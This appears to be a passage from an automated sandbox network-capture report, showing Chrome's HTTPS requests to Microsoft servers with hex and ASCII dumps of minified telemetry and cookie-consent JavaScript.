                                                                                                                                                                                    2024-11-29 18:49:55 UTC16384INData Raw: 63 6f 72 65 44 61 74 61 2c 22 62 65 68 61 76 69 6f 72 22 29 2c 75 65 28 6e 2e 70 61 67 65 54 79 70 65 29 26 26 28 65 2e 70 61 67 65 54 79 70 65 3d 6e 2e 70 61 67 65 54 79 70 65 29 2c 75 65 28 72 2e 5f 70 61 67 65 54 79 70 65 4d 65 74 61 54 61 67 29 26 26 21 75 65 28 65 2e 70 61 67 65 54 79 70 65 29 26 26 28 65 2e 70 61 67 65 54 79 70 65 3d 72 2e 5f 70 61 67 65 54 79 70 65 4d 65 74 61 54 61 67 29 2c 75 65 28 72 2e 5f 6d 61 72 6b 65 74 4d 65 74 61 54 61 67 29 26 26 28 65 2e 6d 61 72 6b 65 74 3d 72 2e 5f 6d 61 72 6b 65 74 4d 65 74 61 54 61 67 29 2c 65 2e 69 73 4c 6f 67 67 65 64 49 6e 3d 47 64 28 72 2e 5f 63 6f 6e 66 69 67 29 2c 74 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 3d 6f 63 28 29 7d 2c 69 70 2e 70 72 6f 74 6f 74 79 70 65 2e 5f 73 65 74 50 61 67 65 54
                                                                                                                                                                                    Data Ascii: coreData,"behavior"),ue(n.pageType)&&(e.pageType=n.pageType),ue(r._pageTypeMetaTag)&&!ue(e.pageType)&&(e.pageType=r._pageTypeMetaTag),ue(r._marketMetaTag)&&(e.market=r._marketMetaTag),e.isLoggedIn=Gd(r._config),t.cookieEnabled=oc()},ip.prototype._setPageT
                                                                                                                                                                                    2024-11-29 18:49:55 UTC16384INData Raw: 6e 21 30 3b 72 65 74 75 72 6e 21 31 7d 2c 41 70 2e 70 72 6f 74 6f 74 79 70 65 2e 5f 69 73 54 72 61 63 6b 65 64 57 69 74 68 44 61 74 61 42 69 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 74 3d 65 2e 61 74 74 72 69 62 75 74 65 73 2c 6e 3d 30 3b 6e 3c 74 2e 6c 65 6e 67 74 68 3b 6e 2b 2b 29 69 66 28 7e 74 5b 6e 5d 2e 6e 61 6d 65 2e 69 6e 64 65 78 4f 66 28 22 64 61 74 61 2d 62 69 2d 22 29 29 72 65 74 75 72 6e 21 30 3b 72 65 74 75 72 6e 21 31 7d 2c 41 70 2e 70 72 6f 74 6f 74 79 70 65 2e 5f 69 73 54 72 61 63 6b 65 64 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 74 3d 65 2e 61 74 74 72 69 62 75 74 65 73 2c 6e 3d 30 3b 6e 3c 74 2e 6c 65 6e 67 74 68 3b 6e 2b 2b 29 69 66 28 22 64 61 74 61 2d 6d 22 3d 3d 3d 74 5b 6e 5d 2e 6e 61 6d
                                                                                                                                                                                    Data Ascii: n!0;return!1},Ap.prototype._isTrackedWithDataBi=function(e){for(var t=e.attributes,n=0;n<t.length;n++)if(~t[n].name.indexOf("data-bi-"))return!0;return!1},Ap.prototype._isTracked=function(e){for(var t=e.attributes,n=0;n<t.length;n++)if("data-m"===t[n].nam
                                                                                                                                                                                    2024-11-29 18:49:55 UTC16384INData Raw: 75 74 68 54 6f 6b 65 6e 22 2c 61 3d 22 41 75 74 68 58 54 6f 6b 65 6e 22 2c 67 67 3d 22 6d 73 66 70 63 22 2c 76 67 3d 22 75 73 65 72 22 2c 68 67 3d 22 61 6c 6c 6f 77 52 65 71 75 65 73 74 53 65 6e 64 69 6e 67 22 2c 6d 67 3d 22 66 69 72 73 74 52 65 71 75 65 73 74 53 65 6e 74 22 2c 79 67 3d 22 73 68 6f 75 6c 64 41 64 64 43 6c 6f 63 6b 53 6b 65 77 48 65 61 64 65 72 73 22 2c 43 67 3d 22 67 65 74 43 6c 6f 63 6b 53 6b 65 77 48 65 61 64 65 72 56 61 6c 75 65 22 2c 62 67 3d 22 73 65 74 43 6c 6f 63 6b 53 6b 65 77 22 2c 79 65 3d 22 6c 65 6e 67 74 68 22 2c 54 67 3d 22 63 6f 6e 63 61 74 22 2c 49 67 3d 22 69 4b 65 79 22 2c 45 67 3d 22 63 6f 75 6e 74 22 2c 5f 67 3d 22 65 76 65 6e 74 73 22 2c 53 67 3d 22 70 75 73 68 22 2c 78 67 3d 22 73 70 6c 69 74 22 2c 4e 67 3d 22 73 70
                                                                                                                                                                                    Data Ascii: uthToken",a="AuthXToken",gg="msfpc",vg="user",hg="allowRequestSending",mg="firstRequestSent",yg="shouldAddClockSkewHeaders",Cg="getClockSkewHeaderValue",bg="setClockSkew",ye="length",Tg="concat",Ig="iKey",Eg="count",_g="events",Sg="push",xg="split",Ng="sp
                                                                                                                                                                                    2024-11-29 18:49:55 UTC16384INData Raw: 29 29 2c 65 5b 6c 76 5d 26 26 28 65 5b 6c 76 5d 3d 65 61 28 65 5b 6c 76 5d 29 29 29 7d 66 75 6e 63 74 69 6f 6e 20 61 28 65 2c 74 29 7b 69 66 28 65 5b 79 76 5d 7c 7c 28 65 5b 79 76 5d 3d 30 29 2c 65 5b 43 76 5d 7c 7c 28 65 5b 43 76 5d 3d 31 29 2c 6c 28 65 29 2c 65 5b 62 76 5d 29 69 66 28 55 7c 7c 61 65 29 65 5b 43 76 5d 3d 33 2c 65 5b 62 76 5d 3d 21 31 3b 65 6c 73 65 20 69 66 28 48 29 72 65 74 75 72 6e 20 57 26 26 28 65 3d 65 61 28 65 29 29 2c 48 5b 72 76 5d 28 45 76 2e 63 72 65 61 74 65 28 65 5b 49 67 5d 2c 5b 65 5d 29 2c 21 30 3d 3d 3d 65 5b 62 76 5d 3f 31 3a 65 5b 62 76 5d 2c 33 29 3b 76 61 72 20 6e 3d 65 5b 43 76 5d 2c 72 3d 63 65 2c 69 3d 52 2c 61 3d 28 34 3d 3d 3d 6e 26 26 28 72 3d 6f 65 2c 69 3d 4f 29 2c 21 31 29 3b 72 3c 69 3f 61 3d 21 43 28 65 2c
                                                                                                                                                                                    Data Ascii: )),e[lv]&&(e[lv]=ea(e[lv])))}function a(e,t){if(e[yv]||(e[yv]=0),e[Cv]||(e[Cv]=1),l(e),e[bv])if(U||ae)e[Cv]=3,e[bv]=!1;else if(H)return W&&(e=ea(e)),H[rv](Ev.create(e[Ig],[e]),!0===e[bv]?1:e[bv],3);var n=e[Cv],r=ce,i=R,a=(4===n&&(r=oe,i=O),!1);r<i?a=!C(e,


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    75192.168.2.64980613.107.246.63443940C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-11-29 18:49:54 UTC551OUTGET /mscc/lib/v2/wcp-consent.js HTTP/1.1
                                                                                                                                                                                    Host: wcpstatic.microsoft.com
                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                    Sec-Fetch-Site: same-site
                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                    Sec-Fetch-Dest: script
                                                                                                                                                                                    Referer: https://learn.microsoft.com/
                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                    2024-11-29 18:49:55 UTC713INHTTP/1.1 200 OK
                                                                                                                                                                                    Date: Fri, 29 Nov 2024 18:49:55 GMT
                                                                                                                                                                                    Content-Type: application/javascript
                                                                                                                                                                                    Content-Length: 52717
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                                                    Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Length,Date,Transfer-Encoding
                                                                                                                                                                                    Age: 42261
                                                                                                                                                                                    Cache-Control: max-age=43200
                                                                                                                                                                                    Content-MD5: QT/MdZzBmCG2G2lBgIsptQ==
                                                                                                                                                                                    Etag: 0x8DA85F6F74C6D08
                                                                                                                                                                                    Last-Modified: Wed, 24 Aug 2022 17:34:58 GMT
                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                    X-Cache: CONFIG_NOCACHE
                                                                                                                                                                                    x-ms-blob-type: BlockBlob
                                                                                                                                                                                    x-ms-lease-status: unlocked
                                                                                                                                                                                    x-ms-request-id: cd2c0d11-601e-007f-642d-42e2da000000
                                                                                                                                                                                    x-ms-version: 2009-09-19
                                                                                                                                                                                    x-azure-ref: 20241129T184955Z-174f7845968xr5c2hC1EWRd0hn0000000h8g000000002m3y
                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                    2024-11-29 18:49:55 UTC15671INData Raw: 76 61 72 20 57 63 70 43 6f 6e 73 65 6e 74 3b 21 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 7b 32 32 39 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 77 69 6e 64 6f 77 2c 65 2e 65 78 70 6f 72 74 73 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 7b 7d 3b 66 75 6e 63 74 69 6f 6e 20 6f 28 6e 29 7b 69 66 28 74 5b 6e 5d 29 72 65 74 75 72 6e 20 74 5b 6e 5d 2e 65 78 70 6f 72 74 73 3b 76 61 72 20 72 3d 74 5b 6e 5d 3d 7b 69 3a 6e 2c 6c 3a 21 31 2c 65 78 70 6f 72 74 73 3a 7b 7d 7d 3b 72 65 74 75 72 6e 20 65 5b 6e 5d 2e 63 61 6c 6c 28 72 2e 65 78 70 6f 72 74 73 2c 72 2c 72 2e 65 78 70 6f 72 74 73 2c 6f 29 2c 72 2e 6c 3d 21 30 2c 72 2e 65 78 70 6f 72 74 73 7d 72 65 74 75 72 6e 20 6f 2e 6d 3d 65 2c 6f 2e 63 3d 74 2c 6f 2e 64 3d 66 75 6e 63 74 69 6f 6e 28 65
                                                                                                                                                                                    Data Ascii: var WcpConsent;!function(){var e={229:function(e){window,e.exports=function(e){var t={};function o(n){if(t[n])return t[n].exports;var r=t[n]={i:n,l:!1,exports:{}};return e[n].call(r.exports,r,r.exports,o),r.l=!0,r.exports}return o.m=e,o.c=t,o.d=function(e
                                                                                                                                                                                    2024-11-29 18:49:55 UTC16384INData Raw: 29 7b 72 65 74 75 72 6e 20 65 3f 65 2e 72 65 70 6c 61 63 65 28 2f 26 2f 67 2c 22 26 61 6d 70 3b 22 29 2e 72 65 70 6c 61 63 65 28 2f 3c 2f 67 2c 22 26 6c 74 3b 22 29 2e 72 65 70 6c 61 63 65 28 2f 3e 2f 67 2c 22 26 67 74 3b 22 29 2e 72 65 70 6c 61 63 65 28 2f 22 2f 67 2c 22 26 71 75 6f 74 3b 22 29 2e 72 65 70 6c 61 63 65 28 2f 27 2f 67 2c 22 26 23 30 33 39 3b 22 29 3a 22 22 7d 2c 65 7d 28 29 2c 61 3d 6e 2e 6c 6f 63 61 6c 73 2c 6c 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 65 28 65 2c 74 2c 6f 2c 6e 2c 72 2c 69 2c 61 29 7b 74 68 69 73 2e 64 69 72 65 63 74 69 6f 6e 3d 22 6c 74 72 22 2c 74 68 69 73 2e 70 72 65 76 69 6f 75 73 46 6f 63 75 73 45 6c 65 6d 65 6e 74 42 65 66 6f 72 65 50 6f 70 75 70 3d 6e 75 6c 6c 2c 74 68 69 73 2e 63 6f 6f 6b 69
                                                                                                                                                                                    Data Ascii: ){return e?e.replace(/&/g,"&amp;").replace(/</g,"&lt;").replace(/>/g,"&gt;").replace(/"/g,"&quot;").replace(/'/g,"&#039;"):""},e}(),a=n.locals,l=function(){function e(e,t,o,n,r,i,a){this.direction="ltr",this.previousFocusElementBeforePopup=null,this.cooki
                                                                                                                                                                                    2024-11-29 18:49:55 UTC16384INData Raw: 6f 72 22 5d 2b 22 20 21 69 6d 70 6f 72 74 61 6e 74 3b 5c 6e 20 20 20 20 20 20 20 20 7d 22 2c 74 2b 3d 27 69 6e 70 75 74 5b 74 79 70 65 3d 22 72 61 64 69 6f 22 5d 2e 27 2b 63 2e 63 6f 6f 6b 69 65 49 74 65 6d 52 61 64 69 6f 42 74 6e 2b 22 20 2b 20 6c 61 62 65 6c 3a 68 6f 76 65 72 3a 3a 61 66 74 65 72 20 7b 5c 6e 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 22 2b 65 5b 22 72 61 64 69 6f 2d 62 75 74 74 6f 6e 2d 68 6f 76 65 72 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 22 5d 2b 22 20 21 69 6d 70 6f 72 74 61 6e 74 3b 5c 6e 20 20 20 20 20 20 20 20 7d 22 2c 74 2b 3d 27 69 6e 70 75 74 5b 74 79 70 65 3d 22 72 61 64 69 6f 22 5d 2e 27 2b 63 2e 63 6f 6f 6b 69 65 49 74 65 6d 52 61 64 69 6f 42 74 6e 2b 22 20 2b 20 6c
                                                                                                                                                                                    Data Ascii: or"]+" !important;\n }",t+='input[type="radio"].'+c.cookieItemRadioBtn+" + label:hover::after {\n background-color: "+e["radio-button-hover-background-color"]+" !important;\n }",t+='input[type="radio"].'+c.cookieItemRadioBtn+" + l
                                                                                                                                                                                    2024-11-29 18:49:55 UTC4278INData Raw: 65 6d 65 6e 74 42 79 49 64 28 22 77 63 70 43 6f 6e 73 65 6e 74 42 61 6e 6e 65 72 43 74 72 6c 22 29 7d 2c 65 2e 65 6d 69 74 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 74 3d 5b 5d 2c 6f 3d 31 3b 6f 3c 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3b 6f 2b 2b 29 74 5b 6f 2d 31 5d 3d 61 72 67 75 6d 65 6e 74 73 5b 6f 5d 3b 76 61 72 20 6e 3d 74 68 69 73 2e 65 76 65 6e 74 73 5b 65 5d 3b 6e 26 26 6e 2e 66 6f 72 45 61 63 68 28 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 61 70 70 6c 79 28 6e 75 6c 6c 2c 74 29 7d 29 29 7d 2c 65 2e 70 72 6f 74 6f 74 79 70 65 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6f 29 7b 65 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 3f 65 2e 61 64 64 45 76 65 6e 74
                                                                                                                                                                                    Data Ascii: ementById("wcpConsentBannerCtrl")},e.emit=function(e){for(var t=[],o=1;o<arguments.length;o++)t[o-1]=arguments[o];var n=this.events[e];n&&n.forEach((function(e){e.apply(null,t)}))},e.prototype.addEventListener=function(e,t,o){e.addEventListener?e.addEvent


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    76192.168.2.64981013.107.246.63443940C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-11-29 18:49:57 UTC373OUTGET /mscc/lib/v2/wcp-consent.js HTTP/1.1
                                                                                                                                                                                    Host: wcpstatic.microsoft.com
                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                    2024-11-29 18:49:58 UTC713INHTTP/1.1 200 OK
                                                                                                                                                                                    Date: Fri, 29 Nov 2024 18:49:57 GMT
                                                                                                                                                                                    Content-Type: application/javascript
                                                                                                                                                                                    Content-Length: 52717
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                                                    Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Length,Date,Transfer-Encoding
                                                                                                                                                                                    Age: 42263
                                                                                                                                                                                    Cache-Control: max-age=43200
                                                                                                                                                                                    Content-MD5: QT/MdZzBmCG2G2lBgIsptQ==
                                                                                                                                                                                    Etag: 0x8DA85F6F74C6D08
                                                                                                                                                                                    Last-Modified: Wed, 24 Aug 2022 17:34:58 GMT
                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                    X-Cache: CONFIG_NOCACHE
                                                                                                                                                                                    x-ms-blob-type: BlockBlob
                                                                                                                                                                                    x-ms-lease-status: unlocked
                                                                                                                                                                                    x-ms-request-id: cd2c0d11-601e-007f-642d-42e2da000000
                                                                                                                                                                                    x-ms-version: 2009-09-19
                                                                                                                                                                                    x-azure-ref: 20241129T184957Z-174f7845968psccphC1EWRuz9s00000010h000000000f2dk
                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                    2024-11-29 18:49:58 UTC15671INData Raw: 76 61 72 20 57 63 70 43 6f 6e 73 65 6e 74 3b 21 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 7b 32 32 39 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 77 69 6e 64 6f 77 2c 65 2e 65 78 70 6f 72 74 73 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 7b 7d 3b 66 75 6e 63 74 69 6f 6e 20 6f 28 6e 29 7b 69 66 28 74 5b 6e 5d 29 72 65 74 75 72 6e 20 74 5b 6e 5d 2e 65 78 70 6f 72 74 73 3b 76 61 72 20 72 3d 74 5b 6e 5d 3d 7b 69 3a 6e 2c 6c 3a 21 31 2c 65 78 70 6f 72 74 73 3a 7b 7d 7d 3b 72 65 74 75 72 6e 20 65 5b 6e 5d 2e 63 61 6c 6c 28 72 2e 65 78 70 6f 72 74 73 2c 72 2c 72 2e 65 78 70 6f 72 74 73 2c 6f 29 2c 72 2e 6c 3d 21 30 2c 72 2e 65 78 70 6f 72 74 73 7d 72 65 74 75 72 6e 20 6f 2e 6d 3d 65 2c 6f 2e 63 3d 74 2c 6f 2e 64 3d 66 75 6e 63 74 69 6f 6e 28 65
                                                                                                                                                                                    Data Ascii: var WcpConsent;!function(){var e={229:function(e){window,e.exports=function(e){var t={};function o(n){if(t[n])return t[n].exports;var r=t[n]={i:n,l:!1,exports:{}};return e[n].call(r.exports,r,r.exports,o),r.l=!0,r.exports}return o.m=e,o.c=t,o.d=function(e
                                                                                                                                                                                    2024-11-29 18:49:58 UTC712INData Raw: 29 7b 72 65 74 75 72 6e 20 65 3f 65 2e 72 65 70 6c 61 63 65 28 2f 26 2f 67 2c 22 26 61 6d 70 3b 22 29 2e 72 65 70 6c 61 63 65 28 2f 3c 2f 67 2c 22 26 6c 74 3b 22 29 2e 72 65 70 6c 61 63 65 28 2f 3e 2f 67 2c 22 26 67 74 3b 22 29 2e 72 65 70 6c 61 63 65 28 2f 22 2f 67 2c 22 26 71 75 6f 74 3b 22 29 2e 72 65 70 6c 61 63 65 28 2f 27 2f 67 2c 22 26 23 30 33 39 3b 22 29 3a 22 22 7d 2c 65 7d 28 29 2c 61 3d 6e 2e 6c 6f 63 61 6c 73 2c 6c 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 65 28 65 2c 74 2c 6f 2c 6e 2c 72 2c 69 2c 61 29 7b 74 68 69 73 2e 64 69 72 65 63 74 69 6f 6e 3d 22 6c 74 72 22 2c 74 68 69 73 2e 70 72 65 76 69 6f 75 73 46 6f 63 75 73 45 6c 65 6d 65 6e 74 42 65 66 6f 72 65 50 6f 70 75 70 3d 6e 75 6c 6c 2c 74 68 69 73 2e 63 6f 6f 6b 69
                                                                                                                                                                                    Data Ascii: ){return e?e.replace(/&/g,"&amp;").replace(/</g,"&lt;").replace(/>/g,"&gt;").replace(/"/g,"&quot;").replace(/'/g,"&#039;"):""},e}(),a=n.locals,l=function(){function e(e,t,o,n,r,i,a){this.direction="ltr",this.previousFocusElementBeforePopup=null,this.cooki
                                                                                                                                                                                    2024-11-29 18:49:58 UTC16384INData Raw: 61 2d 6c 61 62 65 6c 3d 22 27 2b 69 2e 65 73 63 61 70 65 48 74 6d 6c 28 74 68 69 73 2e 74 65 78 74 52 65 73 6f 75 72 63 65 73 2e 70 72 65 66 65 72 65 6e 63 65 73 44 69 61 6c 6f 67 43 6c 6f 73 65 4c 61 62 65 6c 29 2b 27 22 20 63 6c 61 73 73 3d 22 27 2b 61 2e 63 6c 6f 73 65 4d 6f 64 61 6c 49 63 6f 6e 2b 27 22 20 74 61 62 69 6e 64 65 78 3d 22 30 22 3e 26 23 78 32 37 31 35 3b 3c 2f 62 75 74 74 6f 6e 3e 5c 6e 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 72 6f 6c 65 3d 22 64 6f 63 75 6d 65 6e 74 22 20 63 6c 61 73 73 3d 22 27 2b 61 2e 6d 6f 64 61 6c 42 6f 64 79 2b 27 22 3e 5c 6e 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 3e 5c 6e 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 31 20 63 6c 61 73 73 3d 22 27 2b 61 2e 6d 6f
                                                                                                                                                                                    Data Ascii: a-label="'+i.escapeHtml(this.textResources.preferencesDialogCloseLabel)+'" class="'+a.closeModalIcon+'" tabindex="0">&#x2715;</button>\n <div role="document" class="'+a.modalBody+'">\n <div>\n <h1 class="'+a.mo
                                                                                                                                                                                    2024-11-29 18:49:58 UTC16382INData Raw: 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 22 2b 65 5b 22 72 61 64 69 6f 2d 62 75 74 74 6f 6e 2d 64 69 73 61 62 6c 65 64 2d 63 6f 6c 6f 72 22 5d 2b 22 20 21 69 6d 70 6f 72 74 61 6e 74 3b 5c 6e 20 20 20 20 20 20 20 20 7d 22 7d 2c 65 7d 28 29 2c 64 3d 5b 22 61 72 22 2c 22 68 65 22 2c 22 70 73 22 2c 22 75 72 22 2c 22 66 61 22 2c 22 70 61 22 2c 22 73 64 22 2c 22 74 6b 22 2c 22 75 67 22 2c 22 79 69 22 2c 22 73 79 72 22 2c 22 6b 73 2d 61 72 61 62 22 5d 2c 75 3d 7b 22 63 6c 6f 73 65 2d 62 75 74 74 6f 6e 2d 63 6f 6c 6f 72 22 3a 22 23 36 36 36 36 36 36 22 2c 22 73 65 63 6f 6e 64 61 72 79 2d 62 75 74 74 6f 6e 2d 64 69 73 61 62 6c 65 64 2d 6f 70 61 63 69 74 79 22 3a 22 31 22 2c 22 73 65 63 6f 6e 64 61 72 79 2d 62 75 74 74 6f 6e
                                                                                                                                                                                    Data Ascii: background-color: "+e["radio-button-disabled-color"]+" !important;\n }"},e}(),d=["ar","he","ps","ur","fa","pa","sd","tk","ug","yi","syr","ks-arab"],u={"close-button-color":"#666666","secondary-button-disabled-opacity":"1","secondary-button
                                                                                                                                                                                    2024-11-29 18:49:58 UTC3568INData Raw: 74 28 22 2d 22 29 5b 30 5d 3b 6f 3d 65 2e 73 70 6c 69 74 28 22 2d 22 29 5b 30 5d 3d 3d 3d 6e 7d 72 65 74 75 72 6e 20 6f 7d 28 65 2c 63 29 7d 29 29 3b 73 26 26 30 3d 3d 3d 73 2e 6c 65 6e 67 74 68 26 26 28 65 3d 22 65 6e 2d 55 53 22 29 2c 6f 2e 70 6c 61 63 65 68 6f 6c 64 65 72 45 6c 65 6d 65 6e 74 3d 6c 2c 72 26 26 6f 2e 63 6f 6e 73 65 6e 74 43 68 61 6e 67 65 64 43 61 6c 6c 62 61 63 6b 73 2e 72 65 67 69 73 74 65 72 43 61 6c 6c 62 61 63 6b 28 72 29 2c 6f 2e 73 61 76 65 43 6f 6f 6b 69 65 28 29 2c 6f 2e 73 69 74 65 43 6f 6e 73 65 6e 74 3d 6e 65 77 20 66 28 21 31 29 2c 6e 75 6c 6c 3d 3d 6e 7c 7c 6e 28 76 6f 69 64 20 30 2c 6f 2e 73 69 74 65 43 6f 6e 73 65 6e 74 29 2c 6f 2e 69 73 49 6e 69 74 52 65 61 64 79 3d 21 30 2c 74 68 69 73 2e 63 6f 6e 73 65 6e 74 43 68 61
                                                                                                                                                                                    Data Ascii: t("-")[0];o=e.split("-")[0]===n}return o}(e,c)}));s&&0===s.length&&(e="en-US"),o.placeholderElement=l,r&&o.consentChangedCallbacks.registerCallback(r),o.saveCookie(),o.siteConsent=new f(!1),null==n||n(void 0,o.siteConsent),o.isInitReady=!0,this.consentCha


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    77192.168.2.64981113.107.246.63443940C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-11-29 18:49:57 UTC370OUTGET /scripts/c/ms.jsll-4.min.js HTTP/1.1
                                                                                                                                                                                    Host: js.monitor.azure.com
                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                    2024-11-29 18:49:58 UTC889INHTTP/1.1 200 OK
                                                                                                                                                                                    Date: Fri, 29 Nov 2024 18:49:58 GMT
                                                                                                                                                                                    Content-Type: text/javascript; charset=utf-8
                                                                                                                                                                                    Content-Length: 207935
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                    Cache-Control: no-transform, public, max-age=1800, immutable
                                                                                                                                                                                    Last-Modified: Mon, 14 Oct 2024 17:27:31 GMT
                                                                                                                                                                                    ETag: 0x8DCEC757C1AD1D1
                                                                                                                                                                                    x-ms-request-id: 24663fe8-301e-00d3-0bb2-2cfca8000000
                                                                                                                                                                                    x-ms-version: 2009-09-19
                                                                                                                                                                                    x-ms-meta-jssdkver: 4.3.3
                                                                                                                                                                                    x-ms-meta-jssdksrc: [cdn]/scripts/c/ms.jsll-4.3.3.min.js
                                                                                                                                                                                    Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,x-ms-meta-jssdkver,x-ms-meta-jssdksrc,Content-Type,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                                                    x-azure-ref: 20241129T184957Z-174f7845968cpnpfhC1EWR3afc0000000zw000000000gasu
                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                    X-Cache-Info: L1_T2
                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                    2024-11-29 18:49:58 UTC15495INData Raw: 2f 2a 21 0a 20 2a 20 31 44 53 20 4a 53 4c 4c 20 53 4b 55 2c 20 34 2e 33 2e 33 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 63 29 20 4d 69 63 72 6f 73 6f 66 74 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 2e 20 41 6c 6c 20 72 69 67 68 74 73 20 72 65 73 65 72 76 65 64 2e 0a 20 2a 20 28 4d 69 63 72 6f 73 6f 66 74 20 49 6e 74 65 72 6e 61 6c 20 4f 6e 6c 79 29 0a 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 22 75 6e 64 65 66 69 6e 65 64 22 3b 69 66 28 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 26 26 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 21 3d 6e 29 74 28 65 78 70 6f 72 74 73 29 3b 65 6c 73 65 20 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69
                                                                                                                                                                                    Data Ascii: /*! * 1DS JSLL SKU, 4.3.3 * Copyright (c) Microsoft and contributors. All rights reserved. * (Microsoft Internal Only) */!function(e,t){var n="undefined";if("object"==typeof exports&&typeof module!=n)t(exports);else if("function"==typeof define&&defi
